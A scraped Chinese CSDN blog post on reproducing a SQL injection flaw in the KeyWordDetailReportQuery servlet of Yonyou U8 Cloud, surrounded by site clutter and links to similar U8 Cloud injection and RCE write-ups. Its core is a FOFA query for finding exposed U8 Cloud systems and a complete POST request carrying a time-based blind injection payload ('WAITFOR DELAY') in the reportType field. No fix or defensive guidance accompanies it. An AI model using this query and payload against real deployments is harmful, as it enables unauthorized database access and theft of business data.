【漏洞复现】用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞

最新推荐文章于 2024-07-12 07:13:33 发布

新疆东坡肉

最新推荐文章于 2024-07-12 07:13:33 发布

阅读量512

点赞数 6

分类专栏：漏洞复现文章标签： sql 数据库 web安全网络安全

本文链接：https://blog.csdn.net/weixin_45530380/article/details/135355118

版权

漏洞复现专栏收录该内容

24 篇文章 3 订阅

订阅专栏

文章目录

漏洞描述

用友U8 Cloud 提供企业级云ERP整体解决方案，全面支持多组织业务协同，实现企业互联网资源连接。U8 Cloud 亦是亚大地区成长型企业最广泛采用的云解决方案。

资产测绘

FOFA：app="用友U8 Cloud"

漏洞复现

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery  HTTP/1.1
host:127.0.0.1

{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

新疆东坡肉

关注关注

6
点赞
踩
6

收藏

觉得还不错? 一键收藏
1
评论
【漏洞复现】用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞

【代码】【漏洞复现】用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞。
复制链接

扫一扫

专栏目录

用友U8 Cloud ReportDetailDataQuery SQL注入漏洞复现(QVD-2023-47860)

0xSec

02-05

641

用友U8 cloud ReportDetailDataQuery接口处存在SQL注入漏洞，攻击者未经授权可以访问数据库中的数据，从而盗取用户数据，造成用户信息泄露。

用友U8C_开放平台技术分享 - 对外.pptx

02-16

用友U8C_开放平台技术分享 - 对外

1 条评论您还未登录，请先登录后发表或查看评论

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

qq_42067124的博客

12-28

628

U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

用友U8 Cloud SQL注入漏洞复现

12-06

404

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

用友u8-cloud RegisterServlet SQL注入漏洞复现

fly夏天的博客

12-25

1328

用友U8 cloud是用友推出的企业上云数字化平台，该产品RegisterServlet接口处存在SQL注入漏洞，攻击者可通过该漏洞获取数据库权限。文章复现了该漏洞并提供了进一步利用的相关方案。并提供了官方的修复方案。

用友U8_EAI数据接口常见问题.doc

10-12

公司经常和用友EAI做接口，整理了一些经常遇到一些问题。

用友U8_12.5按天统计库存 SQL语句

11-03

支持用友U8_12.5及以上根据期初库存与出入库单据统计某日库存量可实现通过批号或序列号统计，汇总

用友U8_V11.0安装说明

03-15

用友U8_V11.0安装说明，新手可以学习一下环境配置

U8_UAP_Net平台客户开发案例_三维通信_杨赫_U8_用友U8_

09-28

本文将围绕“U8_UAP_Net平台客户开发案例”展开，具体关注的是三维通信公司在使用用友U8系统进行客户开发的实际应用场景。一、U8++UAP平台介绍 U8++是用友公司推出的企业级业务管理软件，它集成了财务管理、供应...

如何解决 PostgreSQL 中由于索引不当导致的性能下降问题？

最新发布

技术笔记

07-12

743

比如说，有一个订单表，其中“订单日期”这个列经常被用于按时间范围查询订单，但却没有为其创建索引，这就会导致数据库在查询时需要遍历整个表，极大地降低了查询速度。命令，我们可以查看查询的执行计划。再举一个例子，如果我们发现某个表上存在多个类似的索引，比如“idx_age_1”和“idx_age_2”，并且它们的定义几乎相同，这时候就可以考虑删除其中一个冗余的索引，以减少维护成本和提高性能。然而，就像任何复杂的系统一样，它也可能会遇到性能方面的挑战，其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。

SQL笔试题【数据岗】

房东的猫的博客

07-11

281

题目 4：输出一张 dws 表，查询过去任意日期的曝光活跃用户的 7 日留存率，输出字段日期，用户 id，7 日留存率具体表结构如下表 1 用户行为表：t_user_video_action_d l分区：ds（格式 yyyyMMdd） l主键：user_id、video_id l含义：一个用户对一个视频的所有行为聚合，每天增量字段名字段含义类型。题目 3：计算每个用户每天第一次曝光视频的时间戳，运行速度越快越好，输出字段日期，用户 id，时间戳。

【postgresql】视图（View）

一个写了10年bug的程序员日常笔记。

07-10

566

PostgreSQL 中的视图（View）是一种虚拟表，其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作，使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的，因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器，当尝试 DELETE、INSERT 或 UPDATE 视图时触发，需要做的动作在触发器内容中定义。

[高频 SQL 50 题(基础版)]第一千七百五十七题，可回收且低脂产品

weixin_45201305的博客

07-10

296

low_fats 是枚举类型，取值为以下两种 ('Y', 'N')，其中 'Y' 表示该产品是低脂产品，'N' 表示不是低脂产品。recyclable 是枚举类型，取值为以下两种 ('Y', 'N')，其中 'Y' 表示该产品可回收，而 'N' 表示不可回收。没什么难度，作为基础题五十题的第一题练手，现在也开始陆续写一些SQL，作为记录，和leetcode一起，大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键（具有唯一值的列）。

SQL面试题-留存率计算

xiao4816的博客

07-07

400

计算的是整段时间范围内，每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间，计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出，每天的不同时间范围的留存率。缺点：如果要计算n天留存需要增加代码量。但是不是很直观，并且计算量比较大。优点：代码直观好理解。

sqlmap使用之-post注入、head注入(ua、cookie、referer)

weixin_51520483的博客

07-11

204

bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。

SQL Server设置端口：跨平台指南

招风的黑耳CSDN

07-09

616

在使用SQL Server时，设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上，包括Windows、Linux和Docker容器等，因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南，帮助您在不同环境下设置SQL Server的端口。

NoSQL之Redis配置与优化

henanchenxuyuan的博客

07-11

1251

Redis(RemoteDictionaryServer，远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化，采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程，当多个客户端同时访问时，服务器的处理能力是会有一定程度的下降;

夜天之书 #99 改良 SQL Interval 语法：一次开源贡献的经历

Miracle

07-10

440

本文是 GreptimeDB 首位独立 Committer Eugene Tolbakov所作。在上一篇文章《GreptimeDB 首位独立 Committer Eugene Tolbakov 是怎样炼成的？》当中，我从社群维护者的视角介绍了 Eugene 的参与和成长之路。这篇文章是在此之后 Eugene 受到激励，从自己的角度出发，结合最近为 GreptimeDB 改良 SQL Interv...

用友u8 cloud 反序列化rce漏洞复现

12-05

用友U8 Cloud是一款企业级管理软件，但是近期被发现存在反序列化远程命令执行（RCE）漏洞。要复现这个漏洞，首先需要一个能够触发反序列化的点，比如一个可控制的对象。接下来，我们可以构造一个恶意的序列化数据，...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交